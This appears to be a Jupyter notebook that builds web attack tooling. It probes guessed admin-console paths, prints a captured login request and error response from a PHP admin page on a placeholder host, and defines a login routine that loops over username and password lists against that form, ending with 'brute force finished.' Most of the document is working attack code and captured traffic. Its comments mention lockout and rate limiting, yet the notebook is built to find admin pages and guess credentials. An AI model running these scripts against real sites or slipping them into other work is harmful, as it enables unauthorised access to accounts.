In [1]:
import requests
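def check_url(url):
    """
    Request *url* with GET and return the HTTP status code of the final response.

    requests follows redirects by default, so the value returned is the status
    of the last hop, not necessarily of *url* itself: a path that redirects to
    a login or landing page is reported as 200 even though the requested
    resource was never served.

    Returns 404 when no HTTP response is obtained at all (connection failure
    or timeout).  That value is a sentinel kept for existing callers, which
    only compare against 200; it is not a status sent by a server.
    """
    try:
        # Without a timeout requests waits indefinitely on an unresponsive host.
        response = requests.get(url, timeout=10)
    except (requests.ConnectionError, requests.Timeout):
        # Timeout is listed explicitly: a read timeout is not a ConnectionError,
        # so catching ConnectionError alone would let it escape to the caller.
        return 404
    return response.status_code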
# Smoke test for check_url(): the site root, plus a path whose name
# (not_exists.html) suggests it is expected to be missing.
url_list = [
    'http://www.google.com',
    'http://www.google.com/not_exists.html',
]

# print(...) with a single argument behaves the same under Python 2 and 3.
for url in url_list:
    status_code = check_url(url)
    # 'o' marks a 200 response, 'x' marks every other result.
    if status_code != 200:
        print('url = {0}, status_code = {1}, x'.format(url, status_code))
        continue
    print('url = {0}, status_code = {1}, o'.format(url, status_code))
In [2]:
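# Directory names tried as locations of an administrative console.
_dirs = [
    'admin',
    'administrator',
    'manager',
    'managment',
]

# File base names and extensions combined with each directory above.
_file = [
    'index',
]

_ext = [
    'html',
]


def create_url_list(base_url):
    """
    Build the candidate admin-page URLs for *base_url*.

    Every directory in ``_dirs`` is combined with every ``<file>.<ext>`` pair
    from ``_file`` and ``_ext``, giving ``<base_url>/<dir>/<file>.<ext>``.
    Nothing is requested here; the list is only constructed.

    Read defensively, the list doubles as a checklist: an administrative path
    that answers 200 to an unauthenticated request is exposed.

    Args:
        base_url: scheme and host, with or without a trailing slash.

    Returns:
        A list of URL strings, ordered by directory, then file, then extension.
    """
    # Strip trailing slashes so 'http://host/' does not yield 'http://host//admin/...'.
    root = base_url.rstrip('/')
    url_list = []
    for dir_name in _dirs:
        for file_name in _file:
            for ext in _ext:
                # The file name comes from _file/_ext rather than a literal, so
                # a misspelled extension cannot make every candidate miss.
                url_list.append(
                    '{0}/{1}/{2}.{3}'.format(root, dir_name, file_name, ext)
                )
    return url_list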
# Build the candidate list for the demo host and display it, one URL per line.
# No request is sent in this cell.
url_list = create_url_list('http://www.google.com')
for url in url_list:
    print(url)
In [8]:
# Probe each URL currently in url_list.  check_url() goes through
# requests.get, which follows redirects, so an 'o' can also mean that the
# path redirected to some other page that answered 200.
for url in url_list:
    status_code = check_url(url)
    reached = (200 == status_code)
    if not reached:
        print('url = {0}, status_code = {1}, x'.format(url, status_code))
    else:
        print('url = {0}, status_code = {1}, o'.format(url, status_code))
POST /admin/admin/login_proc.php HTTP/1.1
Host: www.xxx.com
Proxy-Connection: keep-alive
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxx.com/admin/main/main.html
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,ja;q=0.2
Cookie: log_cookie=today; PHPSESSID=b03ee6b66d8f59a1602be7a100412945
id=asdmin&x=26&y=15&pw=asdmin
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2015 07:30:10 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips PHP/5.3.19
X-Powered-By: PHP/5.3.19
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 418
Connection: close
Content-Type: text/html;charset=utf-8
<script type="text/javascript">
alert("로그인 정보가 틀렸습니다.시스템 관리자에게 문의 하세요!");
history.go(-1);</script>
<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/seon/public_html/admin/admin/login_proc.php</b> on line <b>27</b><br />
<script>
window.location.href="admin_pw.php?menuBid=1&menuSid=0";
</script>
In [15]:
import requests
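def login(id, pw):
    """
    Submit one id/pw pair to the login form and report whether it was accepted.

    Returns True when the response status is 200 and its body does not contain
    the ``history.go(-1)`` script, False otherwise.

    The check is a heuristic taken from the captured failure page, which
    answers 200 and sends the browser back with ``history.go(-1)``.  Any other
    200 body (an error page, a block page, a changed template) is therefore
    reported as a success and needs manual confirmation.

    Each call is one POST to login_proc.php carrying the credentials in the
    request body over plain HTTP.  On the server side, a run of such requests
    from one client is what account lockout, rate limiting and failed-login
    alerting act on.

    Raises:
        requests.RequestException: if no response is obtained (connection
            failure or timeout); nothing is caught here.
    """
    url = 'http://www.xxxx.com/admin/admin/login_proc.php'
    # Hand the fields to requests as pairs so that it form-encodes them.
    # Formatting them into a string by hand breaks the body when id or pw
    # contains '&', '=', '+' or non-ASCII characters.
    payload = [('id', id), ('x', '26'), ('y', '15'), ('pw', pw)]
    header = {'content-type': 'application/x-www-form-urlencoded'}
    # Without a timeout requests waits indefinitely on an unresponsive host.
    response = requests.post(url, data=payload, headers=header, timeout=10)

    if 200 == response.status_code:
        print('headers')
        print('[headers]')
        for name in response.headers:
            print(' {0} = {1}'.format(name, response.headers[name]))
    else:
        print('faild. status = {0}'.format(response.status_code))

    # Compare with '==' and 'in': 'is' tests object identity, which only
    # happens to work for small integers because CPython caches them.
    if response.status_code == 200 and 'history.go(-1)' not in response.text:
        print(url)
        print('[succeeded] id = {0}, pw = {1}'.format(id, pw))
        return True

    print('[fail ] id = {0}, pw = {1}'.format(id, pw))
    return False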
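# Account names and passwords submitted to login(), one pair per request.
id_list = ['adminstrator', 'admin']
pw_list = ['pw123', 'abdddd123']

# The loop variables are named user_id/password rather than id/pw so that
# running this cell does not rebind the builtin id() in the notebook namespace.
# any() stops at the first pair login() accepts, iterating ids in the outer
# position and passwords in the inner one.
found = any(
    login(user_id, password)
    for user_id in id_list
    for password in pw_list
)
print('brute force finished.')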